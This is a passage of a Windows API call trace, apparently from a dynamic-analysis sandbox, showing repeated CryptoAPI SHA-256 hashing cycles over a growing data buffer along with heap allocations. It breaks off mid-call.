[0179.483] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.483] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.483] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.484] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.484] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0179.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dda0 [0179.484] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.484] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.484] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.484] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.484] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0179.484] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e4f0 [0179.484] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.485] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.485] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0179.485] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.485] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0179.485] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dfb0 [0179.485] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.485] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0179.485] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.486] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.486] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0179.486] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e1f0 [0179.486] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.486] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.486] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.487] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.487] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x120, dwFlags=0x0) returned 1 [0179.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dcb0 [0179.487] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.487] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.487] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.487] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.487] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x140, dwFlags=0x0) returned 1 [0179.487] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dce0 [0179.487] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.488] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.488] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0179.488] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.488] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x160, dwFlags=0x0) returned 1 [0179.488] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e5e0 [0179.488] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.488] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0179.488] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.489] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.489] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x180, dwFlags=0x0) returned 1 [0179.489] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ddd0 [0179.489] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.489] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.489] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.490] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.490] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0179.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dd10 [0179.490] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.490] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.490] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338226d0) returned 1 [0179.490] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.490] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0179.490] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e640 [0179.490] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.490] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0179.490] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.491] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.491] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0179.491] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6de90 [0179.491] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.491] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.491] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.492] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.492] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x200, dwFlags=0x0) returned 1 [0179.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e6a0 [0179.492] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.492] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.492] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.492] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.492] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x220, dwFlags=0x0) returned 1 [0179.492] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e700 [0179.492] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.492] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.492] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.493] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.493] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x240, dwFlags=0x0) returned 1 [0179.493] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e220 [0179.493] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.493] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.493] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.494] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.494] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x260, dwFlags=0x0) returned 1 [0179.494] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dec0 [0179.494] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.494] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.494] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.495] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.495] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x280, dwFlags=0x0) returned 1 [0179.495] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6df80 [0179.495] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.495] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.495] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.495] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.495] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0179.495] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6dfe0 [0179.495] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.495] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.495] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.496] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.496] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0179.496] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e0d0 [0179.496] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.496] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.496] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338223d0) returned 1 [0179.497] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.497] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0179.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f1b0 [0179.497] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.497] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0179.497] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0179.497] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.497] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x300, dwFlags=0x0) returned 1 [0179.497] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eb80 [0179.497] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.498] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0179.498] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.498] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.498] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x320, dwFlags=0x0) returned 1 [0179.498] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6efa0 [0179.498] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.498] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.498] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.499] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.499] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x340, dwFlags=0x0) returned 1 [0179.499] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ec70 [0179.499] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.499] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.499] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.499] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.499] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x360, dwFlags=0x0) returned 1 [0179.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ed60 [0179.500] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.500] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.500] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338222d0) returned 1 [0179.500] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.500] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x380, dwFlags=0x0) returned 1 [0179.500] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ef40 [0179.500] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.500] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0179.500] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.501] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.501] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0179.501] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f180 [0179.501] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.501] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.501] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.502] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.502] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0179.502] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f330 [0179.502] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.502] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.502] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.502] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.502] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0179.502] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f150 [0179.502] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.502] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.503] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.504] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.504] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x400, dwFlags=0x0) returned 1 [0179.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e9d0 [0179.504] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.504] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.504] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.504] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.504] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x420, dwFlags=0x0) returned 1 [0179.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6edf0 [0179.505] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.505] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.505] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.505] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.505] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x440, dwFlags=0x0) returned 1 [0179.505] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f000 [0179.505] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.505] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.505] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.506] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.506] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x460, dwFlags=0x0) returned 1 [0179.506] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ea00 [0179.506] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.506] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.506] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.507] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.507] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x480, dwFlags=0x0) returned 1 [0179.507] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f210 [0179.507] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.507] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.507] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.507] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.507] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0179.507] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ef70 [0179.507] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.507] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.507] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.508] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.508] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0179.508] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eb50 [0179.508] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.508] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.508] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0179.509] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.509] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0179.509] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f090 [0179.509] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.509] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0179.509] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.509] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.509] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x500, dwFlags=0x0) returned 1 [0179.509] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e7f0 [0179.509] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.509] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.510] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.510] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.510] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x520, dwFlags=0x0) returned 1 [0179.510] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e760 [0179.510] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.510] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.510] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338229d0) returned 1 [0179.511] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.511] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x540, dwFlags=0x0) returned 1 [0179.511] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ec40 [0179.511] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.511] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0179.511] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0179.511] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.511] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x560, dwFlags=0x0) returned 1 [0179.511] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eb20 [0179.512] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.512] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0179.512] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 